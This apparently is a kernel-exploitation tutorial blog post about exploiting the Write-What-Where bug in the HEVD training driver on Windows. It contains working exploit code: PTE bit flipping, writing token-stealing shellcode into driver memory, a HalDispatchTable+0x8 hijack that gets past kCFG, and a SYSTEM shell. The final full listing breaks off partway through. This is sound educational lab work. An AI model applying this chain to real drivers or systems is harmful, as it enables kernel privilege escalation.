
Kernel Exploitation Primer 0x5 - Arbitrary Write (Write-What-Where)

In this post, I am going to discuss another popular vulnerability class called Arbitrary Write, or Write-What-Where. It is a really interesting topic, and I've tried to document every technique I used here. Let’s get started without further ado.

Write-What-Where Vulnerability Analysis

HEVD has a dedicated handler for the Arbitrary Write vulnerability (also called Write-What-Where), ArbitraryWriteIoctlHandler, whose IOCTL code is 0x22200B.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Basically, this vulnerability allows us to write arbitrary data (what) to an arbitrary memory location (where). We control both the data to write and the location to write it to, hence the name Write-What-Where.

Let’s analyze ArbitraryWriteIoctlHandler in IDA. We can see it calls the TriggerArbitraryWrite function (1️⃣) and passes the user input (2️⃣) to it.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Diving into the function, IDA labels the pointer to the user input (RCX) as UserWriteWhatWhere (1️⃣), and the function later copies that pointer into the R14 register (2️⃣). Now both RCX and R14 hold the pointer to the user input.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Moving on, there is a call to the ProbeForRead() API (1️⃣), which checks that a specified buffer actually resides in the user address space and is correctly aligned. This API takes 3 arguments:

  • The first argument is the user-space address, and we know RCX still holds the user input address.
  • The second argument is the length of the buffer, passed in RDX. Looking at the instructions above (2️⃣), there is a lea edx, [rsi+10h] instruction, and before that (3️⃣) RSI is XORed with itself, so it is zero. The lea computes EDX = 0 + 0x10 without touching memory (a mov with the same operand would instead load from address 0x10), so the length is 0x10 bytes.
  • The final argument is the Alignment, the required alignment in bytes of the start of the user-mode buffer. The value passed here (4️⃣) requests byte alignment, so there is no extra alignment requirement.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

void ProbeForRead(
  [in] const volatile VOID *Address,
  [in] SIZE_T              Length,
  [in] ULONG               Alignment
);

Moving forward, after the ProbeForRead() call there are a few more operations. We already know R14 holds the pointer to the user input; by dereferencing it, the function copies the first 8 bytes into RBX (1️⃣) and the second 8 bytes into RDI (2️⃣). So the input is most likely a structure with two 8-byte members. Finally, it also copies the user input pointer (R14) into R9 (3️⃣).

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Here comes the interesting part. At the end of this block, two major operations happen:

  • RBX holds the first 8 bytes (the first member of the structure) of the user input; the function dereferences it and copies the value it points to into RAX (1️⃣).
  • RDI holds the second 8 bytes (the second member of the structure) of the user input; the function writes the value in RAX to the address in RDI, overwriting whatever was stored there.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

RBX represents WHAT (a pointer to the value to write), and RDI represents WHERE (the address to write to) in this arbitrary write scenario. This means that the 8 bytes at the address given by the second member of the user-provided structure (RDI) are overwritten with the 8 bytes read from the address given by the first member (RBX).

Below is a quick POC that tries to copy whatever value is stored at 0x4141414141414141 to 0x4242424242424242. Of course this will fail because the addresses are not valid, but you get the idea.

// whatwhere.cpp : This file contains the 'main' function. Program execution begins and ends there.
//

#include <Windows.h>
#include <stdio.h>
#include <psapi.h>

#define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)

typedef struct _WRITE_WHAT_WHERE {
    void* WHAT;
    void* WHERE;
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

int main()
{
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %lu\n", GetLastError());
        return 1;
    }

    WRITE_WHAT_WHERE input;
    input.WHAT = (LPVOID)(0x4141414141414141);
    input.WHERE = (LPVOID)(0x4242424242424242);

    printf("[+] Calling TriggerArbitraryWrite....");

    BOOL success = DeviceIoControl( // DeviceIoControl returns BOOL, not NTSTATUS
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    return 0;
}

Dynamic Analysis via WinDBG

Let’s discuss WHAT we are going to write and WHERE we are going to write it. Obviously we want to write our shellcode, but WHERE? It has to go somewhere in kernel space that is safe to overwrite and that we can later execute without causing a BSOD, so it is crucial not to overwrite existing data that might be in use.

There is a popular way to exploit Write-What-Where in the Windows kernel using HalDispatchTable. The Hardware Abstraction Layer (HAL) dispatch table is a table of function pointers. It serves as an interface through which kernel-mode components interact with different hardware.

There is an undocumented Windows API function called NtQueryIntervalProfile(), which internally calls KeQueryIntervalProfile().

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checking KeQueryIntervalProfile(), we can see that the pointer stored at nt!HalDispatchTable+0x8 is moved into RAX (1️⃣), but instead of calling that pointer directly, there is a call to nt!guard_dispatch_icall (2️⃣) (more on this below).

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

As I said earlier, HalDispatchTable is a table of pointers. The second pointer is the one we are going to overwrite with the address of our shellcode, and then we call NtQueryIntervalProfile() to invoke it.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

However, as we noticed, there is no direct call through nt!HalDispatchTable+0x8; the call goes through nt!guard_dispatch_icall, which is part of Kernel Control-Flow Guard (kCFG). So if we replace this pointer (nt!HalDispatchTable+0x8) with a pointer to our user-space shellcode, nt!guard_dispatch_icall will block the call.

kCFG requires Virtualization-Based Security (VBS) and HVCI to be fully implemented, but HVCI is disabled in the current scenario. kCFG contains a bitmap that stores information about valid kernel function entry points. It is used by the kernel to verify whether an indirect function call or jump is legitimate before allowing execution.

Basically, it checks whether the target address placed in RAX (1️⃣ in the image above) is marked as a valid call target in the bitmap. Since HVCI is disabled, we do not need to worry about this. However, kCFG also checks whether the address is in user space or kernel space, and it does this by looking at the address itself rather than at the PTE. So even if we flip the bit from “U” to “K”, it does not matter; it will still block the call to our user-space shellcode.

Let’s summarize what we know so far. If we WRITE our shellcode address to nt!HalDispatchTable+0x8, we can call NtQueryIntervalProfile() to run the pointer we placed there. But kCFG will block the kernel from executing a user-space address. Anyway, let’s give this a try and see it in practice.

Usually we use ROP gadgets to bypass SMEP & VBS by finding the PTE of the user-space shellcode and flipping the “U” flag to “K” before executing the shellcode. In the previous Type Confusion & UAF posts we used a stack pivot in order to execute those ROP gadgets. In this scenario we have a WRITE primitive, but we can also use it as a READ.

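Yes, we can WRITE WHATever value we want WHEREever we want. Because the driver copies 8 bytes from the WHAT address to the WHERE address, we can point WHAT at the location holding the PTE base address and WHERE at a user-space buffer, which reads the kernel value out to us. With that, we can compute the PTE of our shellcode, flip the “U” flag to “K”, and write it back in the next step.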

Method (1) - VBS & SMEP Bypass (Failed)

A quick recap: the MiGetPteAddress() function embeds the PTE base address as an immediate operand, which can be read from MiGetPteAddress+0x13, so this is what we are trying to read now.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 1: Read the PTE base address

  • Allocated 8 bytes of user-space memory (PteBase) using VirtualAlloc(); this is where the PTE base address will be written.
  • Configured the WRITE_WHAT_WHERE structure: WHAT is the address of MiGetPteAddress+0x13, computed from the NT base address (retrieved using EnumDeviceDrivers()) plus the function offset plus 0x13.
  • Then we call DeviceIoControl() with the structure as input.
  • After the call, we read the value stored in PteBase, which is the base address of the PTEs.
    LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    printf("[+] Allocated region to read MiGetPteAddress+0x13 Address: %p\n", PteBase);

    WRITE_WHAT_WHERE input;
    input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // MiGetPteAddress+0x13 
    input.WHERE = (LPVOID)(PteBase);

    printf("[+] Calling TriggerArbitraryWrite....");

    BOOL success = DeviceIoControl( // DeviceIoControl returns BOOL, not NTSTATUS
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    LPVOID* basePTE = (LPVOID*)PteBase;
    printf("[+] Base of PTE: %p\n", *basePTE);
  • Placed a breakpoint on the call to the TriggerArbitraryWrite function; checking RCX, we can see the 2 values we sent.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Moving forward to the arbitrary write (1️⃣), it first loads the value stored at the address in RBX (MiGetPteAddress+0x13) into the RAX register. Stepping over this instruction, we can confirm that RAX holds the PTE base address (2️⃣). Then it writes the value in RAX to the address in RDI (3️⃣), and we can confirm that RDI (PteBase) now contains the PTE base address (4️⃣).

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

We can confirm this in the console as well: it printed the PTE base address. That completes Step 1.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 2: PTE of Shellcode address

  • Now that we have the PTE base address, we can allocate a region for our shellcode (lpMemory).
  • Do the calculation (MiGetPte(), the same function we used in previous posts) to get the PTE address of our shellcode (actualPTE).
  • Then, using TriggerArbitraryWrite, we can read that address to get the value stored there, which is the PFN and the flags of our shellcode page (pfnShellcode).
    LPVOID lpMemory = VirtualAlloc(NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
    printf("[+] Shellcode address: %p\n", lpMemory);
    memcpy(lpMemory, shellcode, sizeof(shellcode));

    uintptr_t ShellcodePte = MiGetPte(lpMemory);
    printf("[+] PTE calculated shellcode address: %p\n", (void*)ShellcodePte);

    uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
    printf("[+] Actual PTE of shellcode address: %p\n", (void*)actualPTE);

    getchar();

    LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);

    input.WHAT = (LPVOID)(actualPTE);
    input.WHERE = (LPVOID)(pfnShellcode);

    printf("[+] Calling TriggerArbitraryWrite (2)....");

    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    LPVOID* pfn = (LPVOID*)pfnShellcode;
    printf("[+] PFN of shellcode: %p\n", *pfn);

Executed the POC and got the shellcode address and the PTE address of the shellcode.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checked the page table entry for the shellcode address; the PTE address (0xFFFFA2816C3B3C80) is the same as what we retrieved through our POC. Note down the value stored in it.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Stepping past the getchar(), the POC retrieved the PTE bits of the shellcode address; comparing them with the image above, both are the same.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 3: Flipping “U/S” bit to “K” bit

  • Now that we have the PTE bits/flags, we can flip the “U/S” bit to “K” by clearing bit 2 (0x4); since the bit is currently set, subtracting or XORing 0x4 does this (modifiedPFN).
  • Then, by calling TriggerArbitraryWrite() with the address of the shellcode PTE as WHERE and a pointer to the modified value as WHAT, we can flip the flag.
    uintptr_t modifiedPFN = (uintptr_t)*pfn - 0x4;
    printf("[+] Modified PFN of shellcode with \"K\" flag: %p\n", (void*)modifiedPFN);

    input.WHAT = (LPVOID)(&modifiedPFN);
    input.WHERE = (LPVOID)(actualPTE);

    printf("[+] Calling TriggerArbitraryWrite (3)....");

    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    getchar();

Executed the POC and we got the success message. Let’s check that in WinDBG.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

The value is modified and the flag is flipped to “K”.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 4: Overwriting HalDispatchTable+0x8

  • Let’s overwrite the HalDispatchTable+0x8 pointer with our shellcode address using the same method.
  • I retrieved the offset of HalDispatchTable (0x00c00a60); we already have the NT base address, and adding the two (plus 0x8) gives the actual address. This is the location we are going to overwrite.
  • The address of the user-space shellcode (lpMemory) is the value we are going to write there.
    input.WHAT = (LPVOID)(&lpMemory);
    input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // nt!HalDispatchTable + 0x8
    printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", lpMemory);
    printf("[+] Calling TriggerArbitraryWrite (4)....");

    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

Placed a breakpoint on the call to TriggerArbitraryWrite and checked the arguments: WHAT contains a pointer to our shellcode address, WHERE is the HalDispatchTable+0x8 address, and the PTE of the shellcode has already been flipped to the “K” flag.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Continuing the execution, we got success from the driver.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checking HalDispatchTable, we can confirm the second pointer is overwritten with our shellcode address.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 5: Execute NtQueryIntervalProfile()

  • Now that everything is in place, the final step is to call NtQueryIntervalProfile(). Since it’s an NT call exported by ntdll.dll, we need to resolve its address first, using the classic combination of GetModuleHandle() and GetProcAddress().
  • Finally, invoke NtQueryIntervalProfile() with appropriate arguments.
    pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
        GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");

    if (!NtQueryIntervalProfile) {
        printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
        return 1;
    }

    printf("[+] Found ntdll!NtQueryIntervalProfile\n");
    printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");

    getchar();

    ULONG x = 0;
    NtQueryIntervalProfile(
        0x1337,
        &x
    );

Placed a breakpoint on KeQueryIntervalProfile(), because NtQueryIntervalProfile() calls it internally.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

The breakpoint on nt!KeQueryIntervalProfile() was hit as expected (1️⃣), and I started walking through the instructions. We can see the pointer at HalDispatchTable+0x8 is moved into the RAX register (2️⃣). Checking the value in RAX (3️⃣), we can confirm it is our user-space shellcode address. Moving on, it makes the call to nt!guard_dispatch_icall with our shellcode address (4️⃣).

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Stepping into nt!guard_dispatch_icall, we can see there is a test instruction on the user-space address, and a conditional jump based on its result. The decision is based on the sign flag (SF).

  • Typically a user-space address is in the range 0x0000000000000000 - 0x00007FFFFFFFFFFF; bit 63 is always 0, so SF is set to 0.
  • A kernel-space address is in the range 0xFFFF800000000000 - 0xFFFFFFFFFFFFFFFF; its bit 63 is 1, so SF is set to 1.
  • Basically, the test instruction sets SF from bit 63 of the address, and the following jump uses it to decide whether this is a user-space or kernel-space address. Since this is a user-space address, SF is 0 and the jump is taken.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Since the target was identified as a user-space address, we ended up with a BSOD. This is why I mentioned at the beginning that even if we change the “U/S” bit to “K”, it does not help: nt!guard_dispatch_icall does not look at the PTE. So we need to find another way to execute our shellcode.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Method (2) - Driver’s Code Cave

The second method is to write our shellcode into kernel space in a place that does not disturb other kernel components. A common approach is to look at the .data section of the driver itself and check whether there is unused space in it, basically looking for a code cave. From the driver’s headers, we can see the virtual address of .data.

0: kd> !dh hevd

File Type: EXECUTABLE IMAGE
FILE HEADER VALUES
    8664 machine (X64)
       7 number of sections
5D1B4BB0 time date stamp Tue Jul  2 05:18:56 2019

       0 file pointer to symbol table
       0 number of symbols
      F0 size of optional header
      22 characteristics
            Executable
            App can handle >2gb addresses
            
[::]

SECTION HEADER #3
   .data name
   80018 virtual size
    3000 virtual address
     200 size of raw data
    1400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C8000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Write

The .data region is readable and writable but not executable, and it has enough space for the shellcode (its virtual size is 0x80018 bytes). It has some data at the beginning, so I skipped the first 0x20 bytes to be sure we are not overwriting anything else. From the PTE of the target address we can see it does not have the “E” flag, so we need to add that.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 1: Finding HEVD base address

  • We are planning to write our shellcode into the .data section of the loaded HEVD driver, so we need to find its base address as well.
  • Modified the getbaseaddress() function I have been using so far. It gets the base addresses of all loaded drivers using EnumDeviceDrivers(), retrieves each driver’s name using GetDeviceDriverBaseNameW(), and compares it with the name of the driver we are looking for, which is passed as an argument.
// whatwhere.cpp : This file contains the 'main' function. Program execution begins and ends there.
//

#include <Windows.h>
#include <stdio.h>
#include <psapi.h>

PVOID getbaseaddress(LPCWSTR name)
{
    BOOL status;
    LPVOID* pImageBase;
    DWORD ImageSize;
    WCHAR driverName[1024];
    LPVOID driverBase = nullptr;

    status = EnumDeviceDrivers(nullptr, 0, &ImageSize);

    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

    status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);

    int driver_count = ImageSize / sizeof(pImageBase[0]);

    for (int i = 0; i < driver_count; i++) {
            GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(driverName[0])); // nSize is a character count, not a byte count

            if (!wcscmp(name, driverName)) {
                driverBase = pImageBase[i];
                break;
            }
    }

    return driverBase;
}

int main()
{
    LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
    printf("[+] Nt base address: %p\n", nt_addr);
    LPVOID hevd_addr = getbaseaddress(L"HEVD.sys");
    printf("[+] HEVD base address: %p\n", hevd_addr);

    return 0;
}

It worked perfectly: we can retrieve the base addresses of both NT and the HEVD driver.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 2: Writing Shellcode to Kernel-space

  • Now that we have the HEVD base address, we can locate the region where we are going to write our shellcode, which is HEVD + 0x3000 + 0x20.
  • Since we can write only 8 bytes at a time, I made a for loop that sends 8 bytes of shellcode at a time to the kernel-space address (HEVD + 0x3000 + 0x20, advancing by 8 on each iteration) by calling TriggerArbitraryWrite.
  • shellcode_start is the kernel-space address where we write the shellcode; since it is advanced inside the loop, I also kept a copy of the starting address as kernelShellcode.
// Step 2

LPVOID shellcode_start = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
LPVOID kernelShellcode = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);

BYTE shellcode[] = {
    0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
    0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
    0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
    0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
    0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
    0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
    0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
    0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

size_t size = sizeof(shellcode);
size_t num_chunks = size / 8;

uint64_t* chunks = new uint64_t[num_chunks];

for (size_t i = 0; i < num_chunks; i++) {
    std::memcpy(&chunks[i], &shellcode[i * 8], 8);

    input.WHAT = (LPVOID)(&chunks[i]);
    input.WHERE = (LPVOID)(shellcode_start);

    printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);

    success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);

}
delete[] chunks;

Executed the POC; we can see the address of our shellcode in the kernel, and it started writing our shellcode to that location.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checking that address after the execution, we can see our shellcode is written here.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 3: PTE & PTE bits of the shellcode

  • This step is the same as what we did in “Method (1)”: we read MiGetPteAddress+0x13 to get the PTE base address (basePTE). We are doing this because the region where we have written our shellcode is only RW and we need RWX.
  • Then calculate the PTE address of our shellcode using MiGetPte() (the same helper I used previously) and store it in actualPTE.
  • Then, using the actualPTE address, we read the PTE value to get the PTE bits for the next operation (pfn).
LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
printf("[+] Allocated region to read MiGetPteAddress+0x13 Address: %p\n", PteBase);

input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // MiGetPteAddress+0x13
input.WHERE = (LPVOID)(PteBase);

printf("[+] Calling TriggerArbitraryWrite....");

success = DeviceIoControl(
    hDriver,
    WRITE_WHAT_WHERE_IOCTL,
    &input,
    sizeof(input),
    nullptr,
    0,
    nullptr,
    nullptr);

if (success) {
    printf("success\n");
}
else {
    printf("failed\n");
    return 1;
}

LPVOID* basePTE = (LPVOID*)PteBase;
printf("[+] Base address of PTE: %p\n", *basePTE);

uintptr_t ShellcodePte = MiGetPte(kernelShellcode);

uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
printf("[+] PTE of shellcode address: %p\n", (void*)actualPTE);

LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);

input.WHAT = (LPVOID)(actualPTE);
input.WHERE = (LPVOID)(pfnShellcode);

printf("[+] Calling TriggerArbitraryWrite....");

success = DeviceIoControl(
    hDriver,
    WRITE_WHAT_WHERE_IOCTL,
    &input,
    sizeof(input),
    nullptr,
    0,
    nullptr,
    nullptr);

if (success) {
    printf("success\n");
}
else {
    printf("failed\n");
    return 1;
}

LPVOID* pfn = (LPVOID*)pfnShellcode;
printf("[+] PFN of shellcode address: %p\n", *pfn);

Executing the POC, we get the PTE address of the shellcode and also read the value. Cross-verified with WinDBG as well.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 4: Clear no-eXecute bit in PTE

  • Now that we have the PTE bits/flags, we need to clear the no-eXecute (NX) bit, which is bit 63. ANDing the value with 0x0FFFFFFFFFFFFFFF does this and gives us the value with the “E” flag (modifiedPFN). Note that this mask clears bits 60-63; 0x7FFFFFFFFFFFFFFF would clear only the NX bit.
  • Then we call TriggerArbitraryWrite and write the modified value (modifiedPFN) to the PTE address (actualPTE) of the shellcode.
uintptr_t modifiedPFN = (uintptr_t)*pfn & 0x0FFFFFFFFFFFFFFF;
printf("[+] Modified PFN of shellcode with \"E\" flag: %p\n", (void*)modifiedPFN);

input.WHAT = (LPVOID)(&modifiedPFN);
input.WHERE = (LPVOID)(actualPTE);

printf("[+] Calling TriggerArbitraryWrite....");

success = DeviceIoControl(
    hDriver,
    WRITE_WHAT_WHERE_IOCTL,
    &input,
    sizeof(input),
    nullptr,
    0,
    nullptr,
    nullptr);

if (success) {
    printf("success\n");
}
else {
    printf("failed\n");
    return 1;
}

The call succeeded, and we can now see the “E” flag on our kernel-space shellcode address.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 5: Overwriting HalDispatchTable+0x8

  • This step is also the same as in “Method (1)”: we simply overwrite the pointer at HalDispatchTable+0x8 with our kernel-space shellcode address (kernelShellcode).
input.WHAT = (LPVOID)(&kernelShellcode);
input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8);
printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", kernelShellcode);
printf("[+] Calling TriggerArbitraryWrite (4)....");

success = DeviceIoControl(
    hDriver,
    WRITE_WHAT_WHERE_IOCTL,
    &input,
    sizeof(input),
    nullptr,
    0,
    nullptr,
    nullptr);

if (success) {
    printf("success\n");
}
else {
    printf("failed\n");
    return 1;
}

The write to HalDispatchTable+0x8 succeeded. Checking HalDispatchTable, the second pointer is now our kernel shellcode address.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 6: Triggering NtQueryIntervalProfile()

  • This is also the same step as before: we call NtQueryIntervalProfile() to trigger the call through HalDispatchTable+0x8.
pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
    GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");

if (!NtQueryIntervalProfile) {
    printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
    return 1;
}

printf("[+] Found ntdll!NtQueryIntervalProfile\n");
printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");

ULONG x = 0;
NtQueryIntervalProfile(
    0x1337,
    &x
);

printf("[+] Spawning a shell with elevated privileges\n\n");
system("cmd");

Placed breakpoints on the API calls and executed the code. The first breakpoint hit was on NtQueryIntervalProfile; after continuing, the second breakpoint on KeQueryIntervalProfile was hit. Let’s walk through this call once again.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

The nt!HalDispatchTable+0x8 pointer is moved to RAX register (1️⃣) and we can also confirm that address is our kernel-space shellcode address (2️⃣). Moving on to the nt!guard_dispatch_icall (3️⃣), let’s step into this call.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Now that we have stepped into nt!guard_dispatch_icall (1️⃣), it executes test rax, rax (2️⃣) to set the sign flag (SF); after the instruction, we can confirm SF is “1”, so the jump is not taken.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Further down, it makes an indirect jmp to the address in RAX, which is our shellcode address.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

And it executed our shellcode: we got a shell as “SYSTEM”.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

  • Full POC:

    // whatwhere.cpp : This file contains the 'main' function. Program execution begins and ends there.
    //
    
    #include <Windows.h>
    #include <stdio.h>
    #include <psapi.h>
    #include <cstdint>
    #include <cstring>
    
    #define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)
    
    typedef struct _WRITE_WHAT_WHERE {
        void* WHAT;
        void* WHERE;
    } WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;
    
    typedef NTSTATUS(WINAPI* pNtQueryIntervalProfile)(IN ULONG ProfileSource, OUT PULONG Interval);
    
    PVOID getbaseaddress(LPCWSTR name)
    {
        BOOL status;
        LPVOID* pImageBase;
        DWORD ImageSize;
        WCHAR driverName[1024];
        LPVOID driverBase = nullptr;
    
        status = EnumDeviceDrivers(nullptr, 0, &ImageSize);
    
        pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    
        status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);
    
        int driver_count = ImageSize / sizeof(pImageBase[0]);
    
        for (int i = 0; i < driver_count; i++) {
                // nSize is a character count, so divide by the size of a WCHAR, not a char
                GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(driverName[0]));
    
                if (!wcscmp(name, driverName)) {
                    driverBase = pImageBase[i];
                    break;
                }
        }
    
